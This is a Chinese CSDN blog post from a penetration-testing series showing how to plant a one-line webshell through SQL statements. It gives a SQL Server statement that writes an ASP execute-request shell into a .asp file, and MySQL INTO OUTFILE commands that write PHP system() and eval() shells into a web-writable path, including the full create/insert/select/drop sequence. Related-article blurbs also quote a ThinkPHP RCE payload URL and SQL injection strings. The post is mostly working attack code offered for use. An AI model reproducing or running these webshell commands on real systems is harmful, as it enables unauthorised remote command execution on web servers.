渗透之——SQL语句生成一句话

最新推荐文章于 2024-10-06 09:50:21 发布
最新推荐文章于 2024-10-06 09:50:21 发布
阅读量3.5k 收藏 3
点赞数 1
分类专栏: 精通渗透系列 文章标签: 渗透 SQL 一句话
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/l1028386804/article/details/85296880
版权

转载请注明出处:https://blog.csdn.net/l1028386804/article/details/85296880

1、SQLServer执行SQL语句生成一句话

select '<%execute request("a")%>' into [NB_master] in 'd:\wwwroot\x.asp;a.xls''excel 8.0;' from NB_master;

NB_master必须是已经存在的表

2、MySQL执行SQL语句生成一句话

select "<?php @system($_POST["cmd"]);?>" into outfile "/home/webaccount/projectname/www/*.php";

完整执行如下:

create table a (cmd text not null);
insert into a(cmd) values('<?php eval($_POST[cmd]);?>');
select cmd from a into outfile '网站可写路径/一句话马名.php';
drop table if exists a;

 

冰 河
关注
专栏目录
WEBSHELL姿势之SQL一句话
forbidd3n,keep going
10-26 6093
之前的两篇WEBSHELL姿势谈到了两种拿SHELL的方法(上传+解析漏洞、http-put/move方法),当然有时最简单的时候就是上传无限制,或者通过改filename后缀实现。这次我们要实验的就是通过MYSQL来实现。 一般来说要利用MYSQL来实现一句话,有如下几种情况: 1.存在sql注入,在没有字符处理时可直接写入一句话(如Select '' into outfile 'F:/ww
渗透测试-SQL语句
zkjsdk的博客
01-13 594
sql语法.note 1.mysql -u root -p 2.查询当前数据库用户: select user(); 3.查询当前路径: select @@basedir; 4.查询所有数据库: show databases; 5.选择一个数据库; use + 数据库名; 6.查询所有表名: show tables; 7.创建一个数据库 : create database 数据库; 8...
sql语法学习
最新发布
萧鼎的博客
10-06 1679
SQL 是一种用于与数据库进行交互的语言,它包括了一组用于数据定义、数据操作、数据控制的语句。SQL的主要作用是从数据库中获取所需的数据,或者对数据库中的数据进行操作。它是一种声明式语言,用户只需说明“做什么”,而不是“怎么做”。SQL 是一门功能强大的语言,通过本文的学习,你了解了SQL的基础语法、常用操作、事务管理、视图、存储过程、触发器等核心概念。掌握这些知识,能够帮助你在日常的数据库操作中更加得心应手。同时,SQL的优化与调试能力也是数据库管理和开发中不可或缺的技能。
渗透常用SQL注入语句大全
woshihaiyong168的博客
09-07 1360
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等.. and 0 and 0 3.猜帐号数目 如果遇到0 and 0 and 1 4.猜解字段名称 在len( ) 括号里面加上我们想到的字段名称.   and 1=(select count(*) from admin w
渗透常用SQL注入语句
u012114090的博客
07-16 758
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表 一般的表的名称无非是admin adminuser user pass password 等.. and 0&lt;&gt;(select count(*) from *) and 0&lt;&gt;(select count(*) from admin) ---判断是否存在admin这张表 3.猜帐号数目 如果遇到0&lt; ...
sql website注入 渗透测试
u011244446的专栏
01-13 409
git clone git://github.com/sqlmapproject/sqlmap.git
php mysql 注入一句话木马_渗透技术--SQL注入写一句话木马原理
weixin_39800387的博客
02-19 2457
讲一下SQL注入中写一句话拿webshell的原理,主要使用的是 SELECT ... INTO OUTFILE 这个语句,下面是一个语句的例子:SELECT * INTO OUTFILE 'C:\log1.txt'这样就可以把查询到的数据写入到C盘的log1.txt这个文件里面。利用这个原理我们可以把PHP的一句话木马写到磁盘上从而拿到webshell。本地的目标站点来实战一下,我们的目的是在目...
网络安全渗透测试——名词解释
weixin_43778463的博客
10-12 3530
常用术语解释
渗透测试——CFS三层靶机渗透
抚琴
01-29 2287
是样一个逻辑 nmap信息收集: nmap -T4 -O 192.168.1.107 http://192.168.1.107/public/ 看到这个版本就会想起:ThinkPHP-V5.0-RCE-远程代码执行漏洞 payload: http://192.168.1.107/public/index.php?s=index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&var.
网络安全——渗透综合实验
HizT_1999的博客
06-24 2360
综合实验: 任务一: 1.使用wireshark分析数据包 通过对test1.cap的分析,可以看出192.168.1.3与192.168.1.4之间存在ftp服务。 2.使用ettercap进行嗅探,获取ftp登录信息 得到ftp服务登录账号:simple 密码:simple123 登录ftp服务器获取key.txt内容。同时还发现192.168.1.4存在WebLogic漏洞,使用 工具进行攻击。 3.weblogic攻击 查看key1.txt内容,提交答案如下: 任务二: 1.分析test
[网络安全自学篇] 六十六.Vulnhub靶机渗透之DC-1提权和Drupal漏洞利用(二)
杨秀璋的专栏
04-11 1万+
这是作者的网络安全自学教程系列,主要是关于安全工具和实践操作的在线笔记,特分享出来与博友们学习,希望您们喜欢,一起进步。前文分享了Vulnhub靶机渗透的环境搭建和JIS-CTF题目,采用Nmap、Dirb、中国蚁剑、敏感文件分析、SSH远程连接、Shell提权等获取5个flag。本文将讲解DC-1提权和Drupal漏洞利用,通过信息收集、CMS漏洞搜索、Metasploit反弹shell、提权及数据库爆破获取flag。本文是一篇Web渗透的基础性文章,希望对您有所帮助。
格式化sql语句的js
09-16
这个脚本使用来格式化sql语句的,获得sql语句后,直接通过sqlFormatter调用formatter函数,并且传入sql语句,会返回一个格式化好了的sql语句
输出到文本的SQL语句
07-24
输出到文本的SQL语句 输出到文本的SQL语句 输出到文本的SQL语句 输出到文本的SQL语句 输出到文本的SQL语句 输出到文本的SQL语句
渗透中的常用语
热门推荐
LiBai'S BLOG
11-17 1万+
本人非网安、信安专业出身,是持证网工,持有华为HCIE-RS、软考网规。也是各大社区的创作者,C站网络领域优质创作者、华为云享专家、掘金创作者等。学习网络安全1年不到,参与过CTF比赛、awd比赛(虽然打的很菜)、担任过华为讲师,现就职于绿盟担任渗透测试人员。 少就是多,慢就是快 低调求发展,潜心学安全 ——李白 前置 打点、踩点:信息收集以及漏洞确认阶段,一般指的是对测试/渗透目标进行信息收集,漏洞的确认。 POC:Proof of Concept,指的是漏洞验证。可以是文档、代码等。 EXP:E.
渗透常用SQL注入语句合集
滴水石穿
03-15 621
1.判断有无注入点 ; and 1=1 and 1=2 2.猜表一般的表的名称无非是admin adminuser user pass password 等… and 0<>(select count(*) from ) and 0<>(select count() from admin) —判断是否存在admin这张表 3.猜帐号数目 如果遇到0< 返回正确页面 1<返回错误页面说明帐号数目就是1个 and 0<(select count() from admin
SQL查询就那么一句话
李志华 博客 专栏
06-11 3049
开篇 SQL查询语句总括: select 字段名 from    表名 [where 条件表达式] [group by 字段列表][having 条件表达式] [order by 字段列表][asc/desc] 单表操练: 单表查询: 1 输出表中的所用的列 select * from 表名 2 选择部分输出 select 列名1,列名2...列名n  fro
sql注入之into outfile语句写入一句话木马_sql的into outfile(1)
2301_77033340的博客
04-12 594
1、漏洞介绍into outfile 语句用于把表数据导出到一个文本文件中,要想mysql用户对文件进行导入导出,首先要看指定的权限目录。mysql 新版本下secure_file_priv参数是用来限制LOAD DATA, SELECT … OUTFILE, and LOAD_FILE()传到哪个指定目录的。当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出;
经典SQL语句大全(绝对的经典)
La victoria的博客
04-08 534
一、基础 1、说明:创建数据库CREATE DATABASE database-name2、说明:删除数据库 drop database dbname3、说明:备份sql server ---创建 备份数据的device USE master EXEC sp_addumpdevice 'disk', 'testBack', 'c:\mssql7backup\MyNwind_1.dat' -...
SQL注入篇——一句话木马
爱国小白帽
01-08 6575
一、利用sql注入上传一句话木马 成功 验证 二、利用dns报错回显查看数据 三、利用dns报错回显数据 返回数据库名的注入语句 1’ and load_file(concat("\\",(database()),".2bmmih.dnslog.cn\1.txt")) – - ...
Java反射机制自动生成SQL语句的实现方法
Java反射 JavaBean 对象自动生成 SQL 语句操作 Java 反射是 Java 语言中的一种机制,它允许程序在运行时检查和修改自身的行为。Java 反射机制可以获取类的信息,例如类的成员变量、方法、构造函数等,并且可以实时...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

冰 河

可以吃鸡腿么?

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值